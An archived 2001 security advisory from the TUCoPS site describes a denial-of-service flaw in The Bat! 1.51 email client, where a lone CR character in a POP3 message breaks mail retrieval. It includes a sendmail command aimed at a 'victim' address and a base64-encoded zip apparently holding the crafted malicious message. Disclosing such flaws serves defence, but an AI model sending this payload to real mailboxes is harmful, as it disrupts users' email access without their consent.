Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: thebat.htm

The Bat! 1.51 fun DoS



Vulnerability

    The Bat!

Affected

    The Bat! 1.51 (latest)

Description

    3APA3A found following.  There   is more fun then security  impact
    in this  issue, but  it's a  kind of  DoS and  can give  a lot  of
    headache to postmasters.  The Bat! is very convenient commercially
    available MUA for Windows with lot of features.

    While  RETRiving  message  via  POP3  (IMAP isn't tested) The Bat!
    incorrectly processes 0x0D (CR) character if it's not followed  by
    0x0A (LF).  The Bat! incorrectly calculates end of the message and
    the part of  message is treated  as reply from  POP3 server.   The
    Bat! fails to receive the rest of the messages and fails to delete
    received messages from server.   This leads to DoS against  user's
    POP3  account.   Malformed  message  can  emulate  any POP3 server
    replies.

    For exploitation, extract attached "badmessage" and send it,  e.g.
    using

        cat badmessage | sendmail -U victim@somewhere.net

    or copy it  to user's mailbox.   This message causes  The Bat!  to
    show something like:

        !13.04.2001, 17:51:01: FETCH - Server reports error. The response is: --ERR Wrong User: replace user with your system administrator--

    message is crafted  to do not  contain this text  somewhere in the
    body.

    ---
    Content-Type: application/octet-stream; name="badmess.zip"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="badmess.zip"
    Content-MD5: dq0gD0D8rsjIUxp7zuVmNg==
    
    UEsDBBQAAAAIACCPjSoKbVmJuAEAAAMEAAAHACQAYmFkbWVzcwoAIAAAAAAAAQAYAAAeNJwh
    xMABwOLkTyLEwAHAstHPG8TAAa1S32/TMBB+5iT+h2NPTCOpna0QvFGtbB0qUgC1KTy7idca
    Gjvyj7H899hRtAmx9mVYebBz39333d13Y3SDSq913V1aUXkjXZcqpe9S47Hcepy2BmmGdMwI
    Zdk7zAihcM2dYDH8JsYiJP5+BJ2QM0LwdbG8PobIwPZRQCGs5RuRzGuGF7EIOaMZpYSm36ZT
    QrNx/k/OBK60ckK5pDRc2VthkpmqdC3VhmG+lg5KvZ9w6dc/ReWCemEdNoEeinkxS74LY6VW
    DGlKHgm6NvTZ+J2TLTdu1Mh7UZ/Di7X2quam+3A0Wyzwh9FqgysrDEMj2h2vBPrwwt/SbbHT
    3qDtrBMN8rqRSlpnuNPmCJaOO28ZrgDKrbQYPo69GqEq3lq/C3Oue5FhRpAkz2D7uycn7t0o
    5Ep1YJi/tMwTA4AIZcA/6PifQoaaI3Nb5Vl2fkBNv1mY9IZtAyS1lUyGrb6yXNVdvLi41SeM
    +/awcU8ZIeyU4gnJonE/FWV/O97rT5J+mU4zkufj/P1lJJ3AzeJrMdjqYo/7JrBcffw8uyoH
    3Esc7AgA89C4UXw3RJ46+IBxAyaFZ24jSeAPUEsBAhkAFAAAAAgAII+NKgptWYm4AQAAAwQA
    AAcAAAAAAAAAAAAgAAAAAAAAAGJhZG1lc3NQSwUGAAAAAAEAAQA1AAAAAQIAAAAA
    
    -----

Solution

    Use "Dispatch Mail on Server" feature to delete malformed  message
    from  server  or  use  different  MUA  as  workaround.   No proper
    solution.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH